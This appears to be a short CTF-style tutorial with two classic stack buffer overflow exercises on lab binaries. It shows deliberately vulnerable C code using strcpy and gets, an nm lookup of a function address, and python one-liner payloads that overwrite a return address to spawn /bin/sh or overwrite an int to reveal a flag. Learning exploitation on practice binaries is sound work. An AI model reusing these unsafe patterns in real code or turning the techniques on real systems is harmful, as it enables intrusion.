Simple Buffer Overflow (no protection) - Function call
# Code
voidcopy_ordre(char*arg){charordre[50];strcpy(ordre,arg);printf("\nOrdre reçu : %s\n\n",ordre);}intmain(intargc,char**argv){if(argc<2){printf("Bienvenue, humain. Donnez-nous vos ordres. En cas de bonne réponse, nous vous épargnerons. Le cas échéant, nous détruirons la terre.\n");printf("Usage: %s <ordre>\n",argv[0]);exit(0);}printf("Bienvenue, humain. Donnez-nous vos ordres. En cas de bonne réponse, nous vous épargnerons. Le cas échéant, nous détruirons la terre.\n");copy_ordre(argv[1]);earth_destroy();return0;}voidearth_destroy(){printf("Mauvaise réponse ! Nous détruirons votre planète dans quelques minutes.\n");}voidearth_alive(){printf("Nous nous avouons vaincu. Vous avez gagné, nous vous rendons la terre !\n");execve("/bin/sh",NULL,NULL);}
# Explanations and Exploit# The goal is to call earth_alive() function# The buffer is 50 bytes long, so by submitting 50+ char, you can override what is after# You have EIP, EBP and one argument (char) on the stack, so 12 bytes# So, to override what you want and call the function, you will need to send 62 char before the payload# The payload is the function adress you want to send
$ nm ./pwn1 | grep "earth_alive"
08048acb T earth_alive
# So, the payload will be the following
./pwn1 $(python -c 'print "A"*62 + "\xcb\x8a\x04\x08"')
Simple BoF - Int override
# Code
intmain(){charbuf[20];intx=0;gets(buf);if(x==1234){// gid_t gid = getegid();
// setresgid(gid, gid, gid);
FILE*fp;fp=fopen("flag.txt","r");charflag[64];fgets(flag,64,(FILE*)fp);printf("Oh, un flag : %s\n",flag);}printf("x value : %d\n",x);return0;}
# Exploitation and Explanations# You want to override the “x” value# In the stack, 20 bytes are allowed to the buffer and 4 bytes are allowed to a pointer for this buffer.# After that comes the value of x, so you can overflow here
$ python -c 'print "a"*24 + "\xd2\x04\x00\x00"'| ./pwn0
$ python -c 'print "a"*24 + "\xd2\x04"'| ./pwn0
$ python -c 'print "a"*22 + "\x00\x00\xd2\x04"'| ./pwn0